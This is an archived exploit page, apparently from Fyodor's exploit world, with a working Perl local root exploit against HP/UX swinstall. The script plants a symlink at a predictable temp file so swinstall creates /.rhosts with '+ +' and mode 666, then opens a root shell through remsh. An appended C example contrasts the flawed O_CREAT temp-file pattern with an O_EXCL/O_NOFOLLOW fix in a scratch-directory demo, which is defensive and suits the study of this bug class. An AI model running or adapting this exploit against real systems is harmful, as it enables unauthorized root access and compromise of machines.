swinstall symlink exploit
Description: Standard symlink hole
Author: "Salty"
Compromise: root (local)
Vulnerable Systems: HP/UX with vulnerable swinstall, mostly 10.x, some 9.x
Date: 6 October 1996
Notes: See the SOD HP Bug of the Week page
Exploit:
#!/usr/bin/perl
# swinstall is a new utility for super-EZ software installation.
# it also happens to make any file you like, and it will do so
# mode 666... Hooray for it! -Salty 8/6/96
# 9.x=/usr/tmp 10.X=/var/tmp... -- not many 9.X's will have swinstall,
# it's not standard, for 9, really.. 10, yes, 9 Mmmm.. There's a version
# of it _for_ 9.x, but it does seem rare..
$swinstall="/usr/sbin/swinstall";
stat($swinstall) || do {
    print STDERR "I can only work on systems that have swinstall loaded..\n";
    print STDERR "Yours doesn't seem to...\n";
    exit;
};
if ($#ARGV<0) {
    $newfile="/.rhosts";
} else {
    $newfile="$ARGV[0]";
}
if (-f "$newfile") {
    print STDERR "$newfile exists!\n";
    print STDERR "I can only make files that don't already exist..\n";
    exit;
}
open(UNAME,"uname -r|");
chop($uname=<UNAME>);
$uname=~s/^..(..)...$/$1/;
umask(0000);
$num=sprintf("%05d",$$+3); # two for exec, three for system.
$tmpfile="/usr/tmp/AAAa$num";
$tmpfile="/var/tmp/AAAa$num" if $uname eq "10";
symlink($newfile,$tmpfile);
print "Please wait one moment while I do stuff...\n";
system("/usr/sbin/swinstall -s '\
+ +
' -p bob localhost:/");
#unlink($tmpfile);
if ($newfile eq "/.rhosts") {
    system("remsh localhost -l root ksh -i");
} else {
    system(">$newfile;ls -l $newfile");
}
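
The class of bug behind this script, seen from the fixing side, as an added example that is not part of the original page or of HP's code: a program creates a temporary file at a predictable path and follows a symlink that was placed there first. It assumes swinstall created its file with a plain create-if-missing open, which is what the script's behaviour implies; the function names, the /tmp/symdemo directory and the file names are constructed for the demo.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Flawed pattern: O_CREAT alone follows a pre-existing symlink and creates
 * whatever it points to; with an inherited umask of 0 the result is mode 666. */
int unsafe_create(const char *path) {
    return open(path, O_WRONLY | O_CREAT, 0666);
}

/* Hardened pattern: O_EXCL makes the open fail (EEXIST) if anything, a symlink
 * included, already sits at the path; O_NOFOLLOW is a second guard; 0600 keeps
 * the file private. mkstemp() gives the same guarantees plus a random name. */
int safe_create(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Builds a private scratch directory, places a symlink at a predictable name
 * pointing to "victim", runs one creator, and reports whether the victim file
 * came into existence through the link.
 * Returns 1 = created, 0 = not created, -1 = setup failure. */
int victim_created(int use_safe) {
    char dir[] = "/tmp/symdemoXXXXXX";      /* constructed scratch location */
    char tmp[128], victim[128];
    struct stat st;
    int fd, created;

    if (!mkdtemp(dir)) return -1;
    snprintf(tmp, sizeof tmp, "%s/AAAa00042", dir);   /* predictable temp name */
    snprintf(victim, sizeof victim, "%s/victim", dir);
    if (symlink(victim, tmp) != 0) { rmdir(dir); return -1; }

    fd = use_safe ? safe_create(tmp) : unsafe_create(tmp);
    if (fd >= 0) close(fd);
    created = (lstat(victim, &st) == 0);

    unlink(victim); unlink(tmp); rmdir(dir);          /* clean up the demo */
    return created;
}

int main(void) {
    printf("unsafe_create: victim created = %d\n", victim_created(0));
    printf("safe_create:   victim created = %d\n", victim_created(1));
    return 0;
}
```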
This page is part of Fyodor's exploit world.